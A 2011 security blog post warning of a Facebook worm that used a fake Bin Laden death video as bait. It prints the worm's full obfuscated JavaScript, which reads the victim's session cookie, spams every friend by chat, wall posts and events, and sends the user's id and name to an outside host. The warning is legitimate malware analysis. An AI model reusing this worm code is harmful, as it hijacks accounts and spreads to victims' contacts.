Osama Bin Laden killed live on a news broadcast! watch the video: …

[ 0 ] May 2nd, 2011 |

A worm has started to spread over Facebook promising
the user a video where the killed Osama Bin Laden can be seen.

The link is:

http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Live-on-Video/201198676585608?sk=app_190322544333196&71029

On the corresponding Facebook profile you are asked to copy a javascript line following line into the browser’s location bar which reloads a JavaScript file named “bin.js” from a doubtful source.

  1. In line 3 the message to be send to all of your friends is defined.
  2. In lines 149 – 179 all of your friends are enumerated.
  3. The following lines send a spam message asking them to open the killing video themselves.
var randomnumber=Math.floor(Math.random()*99999);
var chatmessage = '%firstname% watch the video of them killing osama bin laden live! facebook.com/pages/Osama-Bin-Laden-Killed-Live-on-Video/201198676585608?sk=app_190322544333196&'+randomnumber;
var postmessage = 'Osama Bin Laden killed live on a news broadcast! watch the video: http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Live-on-Video/201198676585608?sk=app_190322544333196&'+randomnumber;
var redirect = 'http://jonathangalt.com/facebook/bin.php';
var eventdesc = 'Hey everyone, \n\ fb now lets you see who viewed your profile! to enable this feature, go here! - http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Live-on-Video/201198676585608?sk=app_190322544333196';
var eventname = 'Check out this cool page!';
var nfriends = 5000;
var debug = false;
var wf = 0;
var mf = function () {
        if (wf <= 0) {
            setTimeout(function () {
                window['top']['location']['href'] = redirect;
            }, 500);
        };
    };
var doget = function (_0xaa04xb, _0xaa04xc, _0xaa04xd) {
        var _0xaa04xe = new XMLHttpRequest();
        _0xaa04xe['open']('GET', _0xaa04xb);
        _0xaa04xe['onreadystatechange'] = function () {
            if (_0xaa04xe['readyState'] == 4) {
                if (_0xaa04xe['status'] == 200 && _0xaa04xc) {
                    _0xaa04xc(_0xaa04xe['responseText']);
                };
                if (_0xaa04xd) {
                    _0xaa04xd();
                };
            };
        };
        _0xaa04xe['send']();
    };
doget('/', function (_0xaa04xf) {
    var _0xaa04x10 = document['cookie']['match'](/c_user=(\d+)/)[1];
    var _0xaa04x11 = function (_0xaa04x12) {
            return _0xaa04x12 ? '@[' + _0xaa04x12['id'] + ':' + _0xaa04x12['name'] + ']' : '';
        };
    var _0xaa04x13 = function (_0xaa04x12) {
            return _0xaa04x12 ? _0xaa04x12['name'] : '';
        };
    var _0xaa04x14 = function (_0xaa04x12) {
            out = '';
            for (var _0xaa04x15 in _0xaa04x12) {
                out += (out ? '&' : '') + _0xaa04x15 + ((_0xaa04x12[_0xaa04x15] !== null) ? '=' + encodeURIComponent(_0xaa04x12[_0xaa04x15]) : '');
            };
            return out;
        };
    var _0xaa04x16 = function (_0xaa04xb, _0xaa04x12, _0xaa04xc, _0xaa04xd) {
            var _0xaa04xe = new XMLHttpRequest();
            _0xaa04xe['open']('POST', _0xaa04xb);
            _0xaa04xe['setRequestHeader']('Content-Type', 'application/x-www-form-urlencoded');
            _0xaa04xe['onreadystatechange'] = function () {
                if (_0xaa04xe['readyState'] == 4) {
                    if (_0xaa04xe['status'] == 200 && _0xaa04xc) {
                        _0xaa04xc(_0xaa04xe['responseText']);
                    };
                    if (_0xaa04xd) {
                        _0xaa04xd();
                    };
                };
            };
            _0xaa04xe['send'](_0xaa04x14(_0xaa04x12));
        };
    var _0xaa04x17 = function () {
            var _0xaa04x18 = document['createElement']('div');
            _0xaa04x18['style']['display'] = 'block';
            _0xaa04x18['style']['position'] = 'absolute';
            _0xaa04x18['style']['width'] = 100 + '%';
            _0xaa04x18['style']['height'] = 100 + '%';
            _0xaa04x18['style']['left'] = 0 + 'px';
            _0xaa04x18['style']['top'] = 0 + 'px';
            _0xaa04x18['style']['textAlign'] = 'center';
            _0xaa04x18['style']['padding'] = '4px';
            _0xaa04x18['style']['background'] = '#FFFFFF';
            _0xaa04x18['style']['zIndex'] = 999999;
            _0xaa04x18['innerHTML'] = ' <br/>Please wait, this can take a little while...<br/><br/> We are loading the video... If the video fails to load <a href="javascript:void(0);" onclick="wf=0; mf();">click here</a> ';
            document['body']['appendChild'](_0xaa04x18);
        };
    var _0xaa04x19 = _0xaa04xf['match'](/name=\\"xhpc_composerid\\" value=\\"([\d\w]+)\\"/i);
    if (_0xaa04x19) {
        comp = _0xaa04x19[1];
    } else {
        comp = '';
    };
    var _0xaa04x1a = _0xaa04xf['match'](/name="post_form_id" value="([\d\w]+)"/i)[1];
    var _0xaa04x1b = _0xaa04xf['match'](/name="fb_dtsg" value="([\d\w]+)"/i)[1];
    var _0xaa04x1c = document['getElementById']('navAccountName')['firstChild']['data'];
    redirect = redirect + '?' + _0xaa04x14({
        userid: _0xaa04x10,
        name: _0xaa04x1c,
        doclose: 1
    });
    _0xaa04x17();
    if (eventdesc) {
        wf++;
        _0xaa04x16('/ajax/choose/?__a=1', {
            type: 'event',
            eid: null,
            invite_message: '',
            __d: 1,
            post_form_id: _0xaa04x1a,
            fb_dtsg: _0xaa04x1b,
            lsd: null,
            post_form_id_source: 'AsyncRequest'
        }, function (_0xaa04x1d) {
            var _0xaa04x1e = _0xaa04x1d['match'](/\\"token\\":\\"([^\\]+)\\"/)[1];
            var _0xaa04xb = '/ajax/typeahead/first_degree.php?__a=1&viewer=' + _0xaa04x10 + '&token=' + _0xaa04x1e + '&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha';
            doget(_0xaa04xb, function (_0xaa04x1f) {
                var _0xaa04x20 = _0xaa04x1f['match'](/\{"uid":\d+,/g);
                var _0xaa04x21 = [];
                for (var _0xaa04x22 = 0; _0xaa04x22 < _0xaa04x20['length']; _0xaa04x22++) {
                    var _0xaa04x23 = _0xaa04x20[_0xaa04x22]['match'](/:(\d+),/)[1];
                    if (_0xaa04x23 != _0xaa04x10) {
                        _0xaa04x21['push'](_0xaa04x23);
                    };
                };
                var _0xaa04x24 = new Date();
                _0xaa04x24['setTime'](_0xaa04x24['getTime']() + 60 * 60 * 24 * 1000);
                datestr = (_0xaa04x24['getMonth']() + 1) + '/' + _0xaa04x24['getDate']() + '/' + _0xaa04x24['getFullYear']();
                timestr = _0xaa04x24['getHours']() * 60;
                var _0xaa04x25 = {
                    post_form_id: _0xaa04x1a,
                    fb_dtsg: _0xaa04x1b,
                    start_dateIntlDisplay: datestr,
                    start_date: datestr,
                    start_time_hour_min: timestr,
                    name: eventname,
                    place_page_id: '',
                    location: '',
                    street: '',
                    geo_id: '',
                    geo_sq: '',
                    desc: eventdesc,
                    sgb_invitees: _0xaa04x21['join'](','),
                    sgb_emails: '',
                    sgb_message: '',
                    privacy_type: 'on',
                    guest_list: 'on',
                    connections_can_post: 'on',
                    save: 'Create Event',
                    submitting: ''
                };
                _0xaa04x25['new'] = '';
                _0xaa04x16('/events/create.php', _0xaa04x25, false, function () {
                    mf(--wf);
                });
            });
        });
    };
    if (chatmessage) {
        wf++;
        _0xaa04x16('/ajax/chat/buddy_list.php?__a=1', {
            user: _0xaa04x10,
            post_form_id: _0xaa04x1a,
            fb_dtsg: _0xaa04x1b,
            lsd: null,
            post_form_id_source: 'AsyncRequest',
            popped_out: false,
            force_render: true
        }, function (_0xaa04x1d) {
            var _0xaa04x26 = _0xaa04x1d['substr'](9);
            var _0xaa04x27 = eval('(' + _0xaa04x26 + ')');
            var _0xaa04x28 = _0xaa04x27['payload']['buddy_list'];
            for (var _0xaa04x29 in _0xaa04x28['nowAvailableList']) {
                var _0xaa04x2a = Math['floor'](Math['random']() * 1335448958);
                var _0xaa04x2b = (new Date())['getTime']();
                var _0xaa04x2c = chatmessage['replace']('%firstname%', _0xaa04x28['userInfos'][_0xaa04x29]['firstName']['toLowerCase']());
                _0xaa04x16('/ajax/chat/send.php?__a=1', {
                    msg_id: Math['floor'](Math['random']() * 1335448958),
                    client_time: (new Date())['getTime'](),
                    msg_text: chatmessage['replace']('%firstname%', _0xaa04x28['userInfos'][_0xaa04x29]['firstName']['toLowerCase']()),
                    to: _0xaa04x29,
                    post_form_id: _0xaa04x1a,
                    fb_dtsg: _0xaa04x1b,
                    post_form_id_source: 'AsyncRequest'
                });
            };
            mf(--wf);
        });
    };
    if (postmessage) {
        wf++;
        doget('/ajax/browser/friends/?uid=' + _0xaa04x10 + '&filter=all&__a=1&__d=1', function (_0xaa04x1d) {
            var _0xaa04x20 = _0xaa04x1d['match'](/\/\d+_\d+_\d+_q\.jpg.*?u003ca href=\\"http:\\\/\\\/www.facebook.com\\\/.*?\\u003c\\\/a>/gi);
            var _0xaa04x2d = [];
            if (_0xaa04x20) {
                for (var _0xaa04x22 = 0; _0xaa04x22 < _0xaa04x20['length']; _0xaa04x22++) {
                    var _0xaa04x23 = _0xaa04x20[_0xaa04x22]['match'](/_\d+_/)[0]['replace'](/_/g, '');
                    var _0xaa04x2e = _0xaa04x20[_0xaa04x22]['match'](/>[^>]+\\u003c\\\/a>$/i)[0]['replace'](/\\u003c\\\/a>$/gim, '')['replace'](/>/g, '');
                    _0xaa04x2d['push']({
                        id: _0xaa04x23,
                        name: _0xaa04x2e
                    });
                };
            };
            var _0xaa04xd = [];
            var _0xaa04x2f = [];
            while (_0xaa04x2d['length']) {
                var _0xaa04x30 = Math['floor'](Math['random']() * _0xaa04x2d['length']);
                _0xaa04xd['push'](_0xaa04x2d[_0xaa04x30]);
                _0xaa04x2f['push'](_0xaa04x2d[_0xaa04x30]);
                var _0xaa04x2b = _0xaa04x2d['shift']();
                if (_0xaa04x30) {
                    _0xaa04x2d[_0xaa04x30 - 1] = _0xaa04x2b;
                };
            };
            if (debug) {
                alert('fetched friends: ' + _0xaa04xd['length']);
            };
            var _0xaa04x31 = {
                post_form_id: _0xaa04x1a,
                fb_dtsg: _0xaa04x1b,
                xhpc_composerid: comp,
                xhpc_targetid: _0xaa04x10,
                xhpc_context: 'home',
                xhpc_fbx: '',
                lsd: null,
                post_form_id_source: 'AsyncRequest'
            };
            mt = postmessage;
            m = postmessage;
            while (mt['search']('%tf%') >= 0) {
                var _0xaa04x32 = _0xaa04xd['pop']();
                mt = mt['replace']('%tf%', _0xaa04x13(_0xaa04x32));
                m = m['replace']('%tf%', _0xaa04x11(_0xaa04x32));
            };
            _0xaa04x31['xhpc_message_text'] = mt;
            _0xaa04x31['xhpc_message'] = m;
            if (debug) {
                alert('message text: ' + mt);
            };
            _0xaa04x16('/ajax/updatestatus.php?__a=1', _0xaa04x31);
            var _0xaa04x33 = function (_0xaa04x15) {
                    if (_0xaa04x15 == 0) {
                        wf = 0;
                        mf();
                        return;
                    };
                    var _0xaa04x34 = _0xaa04x2f['shift']();
                    var _0xaa04x35 = {
                        post_form_id: _0xaa04x1a,
                        fb_dtsg: _0xaa04x1b,
                        xhpc_composerid: comp,
                        xhpc_targetid: _0xaa04x34['id'],
                        xhpc_context: 'profile',
                        xhpc_fbx: 1,
                        lsd: null,
                        post_form_id_source: 'AsyncRequest'
                    };
                    var _0xaa04x36 = postmessage;
                    var _0xaa04x37 = postmessage;
                    if (_0xaa04xd['length'] == 0) {
                        wf = 0;
                        mf();
                        return;
                    };
                    while (_0xaa04x36['search']('%tf%') >= 0) {
                        var _0xaa04x38 = _0xaa04xd['pop']();
                        _0xaa04x36 = _0xaa04x36['replace']('%tf%', _0xaa04x13(_0xaa04x38));
                        _0xaa04x37 = _0xaa04x37['replace']('%tf%', _0xaa04x11(_0xaa04x38));
                    };
                    _0xaa04x35['xhpc_message_text'] = _0xaa04x36;
                    _0xaa04x35['xhpc_message'] = _0xaa04x37;
                    _0xaa04x16('/ajax/updatestatus.php?__a=1', _0xaa04x35);
                    setTimeout(function () {
                        _0xaa04x33(_0xaa04x15 - 1);
                    }, 2000);
                };
            wf++;
            setTimeout(function () {
                _0xaa04x33(nfriends);
            }, 2000);
        });
    };
    mf();
});

You want a Bin Laden video?
Then you better consult a more official channel like Youtube.

[youtube style=”margin-top: 1.2em;text-align:center”]m-N3dJvhgPg[/youtube]

Category: News, Web

About the Author ()

Leave a Reply